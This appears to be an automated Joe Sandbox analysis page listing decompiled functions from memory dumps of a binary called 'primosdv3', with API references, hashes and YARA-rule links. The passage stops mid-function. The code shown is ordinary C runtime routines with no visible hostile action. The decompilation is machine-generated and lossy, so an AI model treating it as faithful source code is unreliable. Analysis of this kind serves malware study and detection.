Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: d5b170149b1bebe81f21c3cbbd7f9ed3e60d563dc7630d7ffe8fb61382b6d218
Instruction ID: ace130d161fabbf67f13006cf5a52cf9664ce1263a82444b08552bc7fb5c72ca
Opcode Fuzzy Hash: d5b170149b1bebe81f21c3cbbd7f9ed3e60d563dc7630d7ffe8fb61382b6d218
Instruction Fuzzy Hash: 2951F571500212AFEB28AF14D84DB7AB7A4FF14318F24452FEC12475A1E731EE40E798

Uniqueness

Uniqueness Score: -1.00%

Function 00C8BF30 Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00C8BF30() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00C8BEF9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00C88E06(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00C88DCC(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x00c8bf3f
0x00c8bf45
0x00c8bf9d
0x00c8bf9d
0x00c8bf47
0x00c8bf48
0x00c8bf4d
0x00c8bf56
0x00c8bf5c
0x00c8bf62
0x00c8bf67
0x00000000
0x00c8bf69
0x00c8bf6f
0x00c8bf74
0x00c8bf92
0x00c8bf8c
0x00c8bf8c
0x00c8bf8e
0x00c8bf8e
0x00c8bf95
0x00c8bf9a
0x00c8bf67
0x00c8bfa1
0x00c8bfa4
0x00c8bfa4
0x00c8bfb2

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00C8BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C8BF5C

Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C84286,?,0000015D,?,?,?,?,00C85762,000000FF,00000000,?,?), ref: 00C88E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C8BF82
_free.LIBCMT ref: 00C8BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C8BFA4

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: d0fee74332d9ddad230ed502816860f9122fb3a0dedcf44d562756efaff421fd
Instruction ID: eb9f52c7b4a1e522e955fb53c742a21ca22374eade25fe8cb1caf89c2c2d43be
Opcode Fuzzy Hash: d0fee74332d9ddad230ed502816860f9122fb3a0dedcf44d562756efaff421fd
Instruction Fuzzy Hash: 7701FC7A6012117F232136F75C8CD7F6B6DDEC2B983140129FA04C2211EF60DE0197B4

Uniqueness

Uniqueness Score: -1.00%

Function 00C89869 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00C89869(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				void* _t17;
				long _t18;

				_t11 = __ecx;
				_t18 = GetLastError();
				_t10 = 0;
				_t2 =  *0xc9e7fc; // 0x6
				_t21 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t17 = E00C8B136(_t11, 1, 0x364);
					_pop(_t13);
					if(_t17 != 0) {
						_t4 = E00C8AEB1(_t10, _t13, _t17, __eflags,  *0xc9e7fc, _t17);
						__eflags = _t4;
						if(_t4 != 0) {
							E00C89649(_t13, _t17, 0xcc2288);
							E00C88DCC(_t10);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t17);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00C88DCC();
						L8:
						SetLastError(_t18);
					}
				} else {
					_t17 = E00C8AE5B(0, _t11, _t16, _t21, _t2);
					if(_t17 != 0) {
						L9:
						SetLastError(_t18);
						_t10 = _t17;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x00c89869
0x00c89874
0x00c89876
0x00c89878
0x00c8987d
0x00c89880
0x00c8988e
0x00c8989a
0x00c8989d
0x00c898a0
0x00c898b2
0x00c898b7
0x00c898b9
0x00c898c4
0x00c898ca
0x00c898d2
0x00c898d4
0x00000000
0x00000000
0x00000000
0x00000000
0x00c898bb
0x00c898bb
0x00000000
0x00c898bb
0x00c898a2
0x00c898a2
0x00c898a3
0x00c898a3
0x00c898d6
0x00c898d7
0x00c898d7
0x00c89882
0x00c89888
0x00c8988c
0x00c898df
0x00c898e0
0x00c898e6
0x00000000
0x00000000
0x00000000
0x00c8988c
0x00c898ed

APIs

GetLastError.KERNEL32(?,?,?,00C891AD,00C8B188,?,00C89813,00000001,00000364,?,00C840EF,?,?,00CA1098), ref: 00C8986E
_free.LIBCMT ref: 00C898A3
_free.LIBCMT ref: 00C898CA
SetLastError.KERNEL32(00000000,?,00CA1098), ref: 00C898D7
SetLastError.KERNEL32(00000000,?,00CA1098), ref: 00C898E0

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 38d10fdf9c87be9f94427a0b091a807761eaf71066b21040a6c6ca648a98f995
Instruction ID: 225399fb2a507780fc6549ba11e5b01acb27d0ca43b063b180fdbed5db93187b
Opcode Fuzzy Hash: 38d10fdf9c87be9f94427a0b091a807761eaf71066b21040a6c6ca648a98f995
Instruction Fuzzy Hash: 3A012632100603ABC21272656C89B3F2569DBD237DB290036F410A22D1EF348D02A32D

Uniqueness

Uniqueness Score: -1.00%

Function 00C8C7FF Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C8C7FF(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xc9eea0; // 0xc9ee94
					if(_t23 != 0) {
						E00C88DCC(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xc9eea4; // 0xcc26fc
					if(_t24 != 0) {
						E00C88DCC(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xc9eea8; // 0xcc26fc
					if(_t25 != 0) {
						E00C88DCC(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xc9eed0; // 0xc9ee98
					if(_t26 != 0) {
						E00C88DCC(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xc9eed4; // 0xcc2700
					if(_t27 != 0) {
						return E00C88DCC(_t6);
					}
				}
				return _t6;
			}

0x00c8c805
0x00c8c80a
0x00c8c80e
0x00c8c814
0x00c8c817
0x00c8c81c
0x00c8c820
0x00c8c826
0x00c8c829
0x00c8c82e
0x00c8c832
0x00c8c838
0x00c8c83b
0x00c8c840
0x00c8c844
0x00c8c84a
0x00c8c84d
0x00c8c852
0x00c8c853
0x00c8c856
0x00c8c85c
0x00000000
0x00c8c864
0x00c8c85c
0x00c8c867

APIs

_free.LIBCMT ref: 00C8C817

Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,?,00000000,?,00000000,?,00C8C8BD,?,00000007,?,?,00C8CCBA,?), ref: 00C88DE2
Part of subcall function 00C88DCC: GetLastError.KERNEL32(?,?,00C8C896,?,00000000,?,00000000,?,00C8C8BD,?,00000007,?,?,00C8CCBA,?,?), ref: 00C88DF4

_free.LIBCMT ref: 00C8C829
_free.LIBCMT ref: 00C8C83B
_free.LIBCMT ref: 00C8C84D
_free.LIBCMT ref: 00C8C85F

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e081f2d12b1ff62f5f727a0cfe8573fed81212436d180fbb39008273001ec18
Instruction ID: c73af0360e9378a7a691bf0ae715227236434819ddaabd76e40f6f71b17182f4
Opcode Fuzzy Hash: 5e081f2d12b1ff62f5f727a0cfe8573fed81212436d180fbb39008273001ec18
Instruction Fuzzy Hash: CCF01232544211AB8720FB68E4C9E1B73EAAB1071C795181BF118D7A92CB70FD80CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00C71FDD Relevance: 7.5, APIs: 5, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C71FDD(void* __eflags, short* _a4, short* _a8, int _a12) {
				void* _t10;
				int _t22;
				int _t23;

				_t10 = E00C83E13(_a4);
				_t23 = _a12;
				if(_t10 + 1 >= _t23) {
					_t22 = _t23;
				} else {
					_t4 = E00C83E13(_a4) + 1; // 0x1
					_t22 = _t4;
				}
				if(E00C83E13(_a8) + 1 < _t23) {
					_t7 = E00C83E13(_a8) + 1; // 0x1
					_t23 = _t7;
				}
				return CompareStringW(0x400, 0x1001, _a4, _t22, _a8, _t23) - 2;
			}

0x00c71fe5
0x00c71fea
0x00c71ff1
0x00c72001
0x00c71ff3
0x00c71ffc
0x00c71ffc
0x00c71ffc
0x00c7200f
0x00c7201a
0x00c7201a
0x00c7201a
0x00c7203b

APIs

_wcslen.LIBCMT ref: 00C71FE5
_wcslen.LIBCMT ref: 00C71FF6
_wcslen.LIBCMT ref: 00C72006
_wcslen.LIBCMT ref: 00C72014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00C6B371,?,?,00000000,?,?,?), ref: 00C7202F

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 618109b13354653d4075f8de91e2ddc6437c53cdc923ec028cbc3354f56059a7
Instruction ID: 12a8468efbb0ca741681e9799bac3ce557e93737eaceeef35de5a67537ea2297
Opcode Fuzzy Hash: 618109b13354653d4075f8de91e2ddc6437c53cdc923ec028cbc3354f56059a7
Instruction Fuzzy Hash: 5EF01D32008054BBCF226F51EC09D8E7F26EB44B61B119416F61A5A061CB72D661E794

Uniqueness

Uniqueness Score: -1.00%

Function 00C88900 Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00C88900(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xc9ee90; // 0x36823a0
					if(_t7 != 0xc9ec70) {
						E00C88DCC(_t7);
						 *0xc9ee90 = 0xc9ec70;
					}
				}
				E00C88DCC( *0xcc2280);
				 *0xcc2280 = 0;
				E00C88DCC( *0xcc2284);
				 *0xcc2284 = 0;
				E00C88DCC( *0xcc26d0);
				 *0xcc26d0 = 0;
				E00C88DCC( *0xcc26d4);
				 *0xcc26d4 = 0;
				return 1;
			}

0x00c88909
0x00c8890d
0x00c8890f
0x00c8891b
0x00c8891e
0x00c88924
0x00c88924
0x00c8891b
0x00c88930
0x00c8893d
0x00c88943
0x00c8894e
0x00c88954
0x00c8895f
0x00c88965
0x00c8896d
0x00c88976

APIs

_free.LIBCMT ref: 00C8891E

Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,?,00000000,?,00000000,?,00C8C8BD,?,00000007,?,?,00C8CCBA,?), ref: 00C88DE2
Part of subcall function 00C88DCC: GetLastError.KERNEL32(?,?,00C8C896,?,00000000,?,00000000,?,00C8C8BD,?,00000007,?,?,00C8CCBA,?,?), ref: 00C88DF4

_free.LIBCMT ref: 00C88930
_free.LIBCMT ref: 00C88943
_free.LIBCMT ref: 00C88954
_free.LIBCMT ref: 00C88965

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ba66802b938809774ef88fa0eeb341d94aeecf8c68458e8a815676ec78c07d89
Instruction ID: e271739e002192b4c8907d710a04b9a4272c4e3177f25627b0c28f213798c889
Opcode Fuzzy Hash: ba66802b938809774ef88fa0eeb341d94aeecf8c68458e8a815676ec78c07d89
Instruction Fuzzy Hash: 82F0DA72810523DB8B46BF14FD06B1D3BA2F724738782054BF524567B1CF714946AB99

Uniqueness

Uniqueness Score: -1.00%

Function 00C715FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00C715FE(intOrPtr* __ecx) {
				char _v516;
				char _v5124;
				signed int _t33;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t51;
				void* _t61;
				void* _t62;

				E00C7EC50(0x1400);
				_t57 = __ecx;
				_t33 =  *(__ecx + 0x48);
				_t61 = _t33 - 0x74;
				if(_t61 > 0) {
					__eflags = _t33 - 0x83;
					if(_t33 == 0x83) {
						E00C7D694();
						__eflags =  *(_t57 + 4);
						if( *(_t57 + 4) == 0) {
							E00C70602( &_v5124, E00C6E617(0xc9), 0xa00);
						} else {
							E00C64092( &_v5124, 0xa00, E00C6E617(0xca),  *(_t57 + 4));
						}
						return E00C7A7E4( *0xca8450,  &_v5124, E00C6E617(0x96), 0);
					}
				} else {
					if(_t61 == 0) {
						_push(0x456);
						L38:
						_push(E00C6E617());
						_push( *_t57);
						L19:
						_t45 = E00C7B776();
						L11:
						return _t45;
					}
					_t62 = _t33 - 0x16;
					if(_t62 > 0) {
						__eflags = _t33 - 0x38;
						if(__eflags > 0) {
							_t46 = _t33 - 0x39;
							__eflags = _t46;
							if(_t46 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t47 = _t46 - 1;
							__eflags = _t47;
							if(_t47 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t48 = _t47 - 1;
							__eflags = _t48;
							if(_t48 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t51 = _t48 - 9;
							__eflags = _t51;
							if(_t51 == 0) {
								_push(0x343);
								goto L38;
							}
							_t33 = _t51 - 1;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t33 = _t33 - 0x17;
							__eflags = _t33 - 0xb;
							if(_t33 <= 0xb) {
								switch( *((intOrPtr*)(_t33 * 4 +  &M00C7190E))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L64;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E00C6E617(0xc8) =  &_v516;
										__eax = E00C64092( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E00C7B776( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t62 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E00C6E617();
							L7:
							_push(0);
							L8:
							return E00C7B776();
						}
						if(_t33 <= 0x15) {
							switch( *((intOrPtr*)(_t33 * 4 +  &M00C718B6))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00C7AECD();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E00C6E617());
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L64;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E00C6E617(0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E00C6E617());
									_push( *_t57);
									goto L8;
							}
						}
					}
				}
				L64:
				return _t33;
			}

0x00c71606
0x00c7160c
0x00c7160e
0x00c71611
0x00c71614
0x00c7183f
0x00c71844
0x00c71846
0x00c7184b
0x00c7184f
0x00c7188c
0x00c71851
0x00c7186b
0x00c71870
0x00000000
0x00c718ab
0x00c7161a
0x00c7161a
0x00c71835
0x00c7175e
0x00c71763
0x00c71764
0x00c716a1
0x00c716a1
0x00c7166a
0x00000000
0x00c7166a
0x00c71620
0x00c71623
0x00c71723
0x00c71726
0x00c717e6
0x00c717e6
0x00c717e9
0x00c7182b
0x00000000
0x00c7182b
0x00c717eb
0x00c717eb
0x00c717ee
0x00c71824
0x00000000
0x00c71824
0x00c717f0
0x00c717f0
0x00c717f3
0x00c71817
0x00c7181a
0x00000000
0x00c7181a
0x00c717f5
0x00c717f5
0x00c717f8
0x00c7180d
0x00000000
0x00c7180d
0x00c717fa
0x00c717fa
0x00c717fd
0x00c71803
0x00000000
0x00c71803
0x00c7172c
0x00c7172c
0x00c717df
0x00000000
0x00c717df
0x00c71732
0x00c71735
0x00c71738
0x00c7173e
0x00000000
0x00c71745
0x00000000
0x00000000
0x00c7174f
0x00000000
0x00000000
0x00c71759
0x00000000
0x00000000
0x00c7176b
0x00000000
0x00000000
0x00c7176f
0x00000000
0x00000000
0x00c71773
0x00c71776
0x00000000
0x00000000
0x00c7177d
0x00000000
0x00000000
0x00c71784
0x00000000
0x00000000
0x00c7178b
0x00c7178e
0x00000000
0x00000000
0x00000000
0x00000000
0x00c71798
0x00c7179b
0x00000000
0x00000000
0x00c717b0
0x00c717bc
0x00c717c1
0x00c717c4
0x00c717ca
0x00000000
0x00000000
0x00c7173e
0x00c71738
0x00c71629
0x00c71629
0x00c7171a
0x00c7171c
0x00c716be
0x00c716be
0x00c71646
0x00c71646
0x00c71648
0x00000000
0x00c7164d
0x00c71632
0x00c71638
0x00000000
0x00c71655
0x00c71657
0x00c7165c
0x00000000
0x00000000
0x00c7163f
0x00c71641
0x00000000
0x00000000
0x00c71663
0x00c71665
0x00000000
0x00000000
0x00c71670
0x00c71673
0x00000000
0x00000000
0x00c7167f
0x00c71682
0x00000000
0x00000000
0x00c71686
0x00c71689
0x00000000
0x00000000
0x00c7168d
0x00c71690
0x00000000
0x00000000
0x00c71697
0x00c71699
0x00c7169e
0x00c7169f
0x00000000
0x00000000
0x00c716a9
0x00c716ac
0x00000000
0x00000000
0x00c716b0
0x00c716b3
0x00000000
0x00000000
0x00c716b7
0x00c716b9
0x00000000
0x00000000
0x00c716c6
0x00c716c8
0x00000000
0x00000000
0x00c716cf
0x00c716d2
0x00000000
0x00000000
0x00c716d9
0x00c716dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00c716e3
0x00c716e6
0x00c716ee
0x00000000
0x00000000
0x00c71703
0x00c71706
0x00000000
0x00000000
0x00c7170d
0x00c71710
0x00c71675
0x00c7167a
0x00c7167b
0x00000000
0x00000000
0x00c71638
0x00c71632
0x00c71623
0x00c718b2
0x00c718b2

APIs

_swprintf.LIBCMT ref: 00C717BC
_swprintf.LIBCMT ref: 00C7186B

Strings

%ls, xrefs: 00C71641, 00C71657
%s: %s, xrefs: 00C717CB

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 1865325f13364b527532a9d0cd94303cc2333bd7eaff337160928a4c9241d8e9
Instruction ID: a12136d121c8c08317351016555e53628a70ecf659c868a666f5b395f7d346bc
Opcode Fuzzy Hash: 1865325f13364b527532a9d0cd94303cc2333bd7eaff337160928a4c9241d8e9
Instruction Fuzzy Hash: 52510635288304F6EA351AADCD46F357665EB05B04F2CC507FF9E740E1D9A2A910B71B

Uniqueness

Uniqueness Score: -1.00%

Function 00C87F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00C87F6E(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00C8BB30(_t52);
					GetModuleFileNameA(0, 0xcc2128, 0x104);
					_t49 =  *0xcc26d8; // 0x3673350
					 *0xcc26e0 = 0xcc2128;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xcc2128;
					}
					_v8 = 0;
					_v16 = 0;
					E00C88092(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00C88207(_v8, _v16, 1);
					if(_t64 != 0) {
						E00C88092(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00C8B643(_t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xcc26cc = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xcc26d0 = _t59;
									L16:
									E00C88DCC(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xcc26cc = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xcc26d0 = _t43;
						goto L10;
					} else {
						_t44 = E00C891A8();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00C88DCC(_t64);
						return _t50;
					}
				} else {
					_t45 = E00C891A8();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00C89087();
					return _t65;
				}
			}

0x00c87f6e
0x00c87f7b
0x00c87f9b
0x00c87fae
